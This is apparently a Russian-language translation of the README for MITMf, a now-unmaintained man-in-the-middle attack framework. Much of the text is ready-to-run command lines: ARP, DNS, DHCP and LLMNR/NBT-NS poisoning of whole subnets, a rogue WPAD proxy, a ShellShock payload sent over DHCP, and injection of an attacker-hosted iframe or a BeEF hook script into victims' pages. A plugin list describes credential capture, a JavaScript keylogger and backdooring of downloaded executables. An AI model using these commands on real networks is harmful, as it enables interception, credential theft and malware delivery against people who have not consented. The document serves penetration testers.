Платформа для атак «Человек посередине»
Этот проект больше не обновляется. MITMf был написан для удовлетворения потребности в современном инструменте для проведения атак «Человек посередине». С тех пор было создано множество других инструментов, чтобы заполнить это пространство, вам, вероятно, следует использовать Bettercap, поскольку он гораздо более функционален и лучше поддерживается.
Краткие руководства, примеры и новости для разработчиков: https://byt3bl33d3r.github.io.
Этот инструмент основан на sergio-proxy и является попыткой оживить и обновить проект.
Свяжитесь со мной по адресу:
Твиттер: @byt3bl33d3r
IRC на Freenode: #MITMf
Электронная почта: [email protected]
Прежде чем отправлять вопросы, пожалуйста, прочтите соответствующий раздел вики.
Пожалуйста, обратитесь к вики за инструкциями по установке.
MITMf стремится предоставить комплексное решение для атак «Человек посередине» и сетевых атак, одновременно обновляя и улучшая существующие атаки и методы.
Первоначально созданный для устранения существенных недостатков других инструментов (например, Ettercap, Mallory), он был почти полностью переписан с нуля, чтобы предоставить модульную и легко расширяемую структуру, которую каждый может использовать для реализации своей собственной атаки MITM.
Платформа содержит встроенный сервер SMB, HTTP и DNS, которым можно управлять и использовать различные плагины, а также модифицированную версию прокси-сервера SSLStrip, которая позволяет модифицировать HTTP и частично обходить HSTS.
Начиная с версии 0.9.8, MITMf поддерживает активную фильтрацию и манипулирование пакетами (в основном то же самое, что и etterfilters, только лучше), позволяя пользователям изменять любой тип трафика или протокола.
Файл конфигурации можно редактировать «на лету» во время работы MITMf, изменения будут передаваться через фреймворк: это позволяет настраивать параметры плагинов и серверов во время проведения атаки.
MITMf будет захватывать FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (строки сообщества), NTLMv1/v2 (все поддерживаемые протоколы, такие как HTTP, SMB, LDAP и т. д.) и учетные данные Kerberos с помощью Net-Creds, который запускается на запускать.
Интеграция ответчиков позволяет осуществлять отравление LLMNR, NBT-NS и MDNS, а также поддержку мошеннических серверов WPAD.
Теперь вы можете изменить любой пакет/протокол, перехваченный MITMf, с помощью Scapy! (больше никаких дополнительных фильтров! ура!)
Например, вот дурацкий маленький фильтр, который просто меняет IP-адрес назначения ICMP-пакетов:
if package.haslayer(ICMP): log.info('Получил ICMP-пакет!') package.dst = '192.168.1.0'
Используйте переменную packet
для доступа к пакету в формате, совместимом со Scapy.
Используйте переменную data
для доступа к необработанным данным пакета.
Теперь, чтобы использовать фильтр, все, что нам нужно сделать, это: python mitmf.py -F ~/filter.py
Вы, вероятно, захотите объединить это с плагином Spoof , чтобы фактически перехватывать пакеты от кого-то другого;)
Примечание . Вы можете изменять фильтры «на лету», не перезапуская MITMf!
Самое простое использование: запуск HTTP-прокси-серверов SMB, DNS, HTTP и Net-Creds на интерфейсе enp3s0:
python mitmf.py -i enp3s0
ARP отравляет всю подсеть шлюзом 192.168.1.1 с помощью плагина Spoof :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
То же, что и выше + мошеннический прокси-сервер WPAD с использованием плагина Responder :
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
Яд ARP 192.168.1.16-45 и 192.168.0.1/24 со шлюзом 192.168.1.1:
python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Включите подмену DNS при отравлении ARP (домены для подмены извлекаются из файла конфигурации):
python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Включите подмену LLMNR/NBTNS/MDNS:
python mitmf.py -i enp3s0 --responder --wredir --nbtns
Включите подмену DHCP (пул IP и подсеть извлекаются из файла конфигурации):
python mitmf.py -i enp3s0 --spoof --dhcp
То же, что и выше, с полезной нагрузкой ShellShock, которая будет выполнена, если какой-либо клиент уязвим:
python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Внедрите HTML IFrame с помощью плагина Inject :
python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Вставьте JS-скрипт:
python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
Запустите авторизованный портал, который перенаправляет все на http://SERVER/PATH:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH
Запустите авторизованный портал по адресу http://your-ip/portal.html, используя страницу по умолчанию /portal.html (thx респондент) и /CaptiveClient.exe (не входит в комплект) из папки config/captive:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive
То же, что и выше, но с именем хоста captive.portal вместо IP (требуется, чтобы captive.portal разрешался в ваш IP-адрес, например, через подделку DNS):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns
Обслуживание авторизованного портала с помощью дополнительного экземпляра SimpleHTTPServer, обслуживающего LOCALDIR по адресу http://IP:8080 (измените порт в mitmf.config):
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR
То же, что и выше, но с именем хоста:
python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns
И многое-многое другое!
Конечно, вы можете смешивать и сочетать практически любой плагин (например, подмена ARP + внедрение + ответчик и т. д.).
Чтобы получить полный список доступных опций, просто запустите python mitmf.py --help
HTA Drive-By : вводит поддельное уведомление об обновлении и предлагает клиентам загрузить приложение HTA.
SMBTrap : использует уязвимость «SMB Trap» на подключенных клиентах.
ScreenShotter : использует HTML5 Canvas для отображения точного снимка экрана браузера клиента.
Ответчик : LLMNR, NBT-NS, WPAD и отравитель MDNS.
SSLstrip+ : Частичный обход HSTS
Подмена : перенаправление трафика с использованием подмены ARP, ICMP, DHCP или DNS.
BeEFAutorun : автозапуск модулей BeEF в зависимости от клиентской ОС или типа браузера.
AppCachePoison : выполняет атаки по отравлению кэша приложений HTML5.
Ferret-NG : прозрачный перехват клиентских сеансов.
BrowserProfiler : пытается перечислить все плагины браузера подключенных клиентов.
FilePwn : исполняемые файлы бэкдора, отправляемые по HTTP с использованием Backdoor Factory и BDFProxy.
Inject : Вставка произвольного контента в HTML-контент.
BrowserSniper : выполняет атаки на клиенты с устаревшими плагинами браузера.
JSkeylogger : внедряет кейлоггер Javascript на веб-страницы клиента.
Заменить : заменить произвольное содержимое в содержимом HTML.
SMBAuth : вызвать попытки аутентификации типа «запрос-ответ» SMB.
Upsidedowninternet : переворачивает изображения на 180 градусов.
Captive : создает авторизованный портал, перенаправляя HTTP-запросы с использованием 302.
BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU
ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee
LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr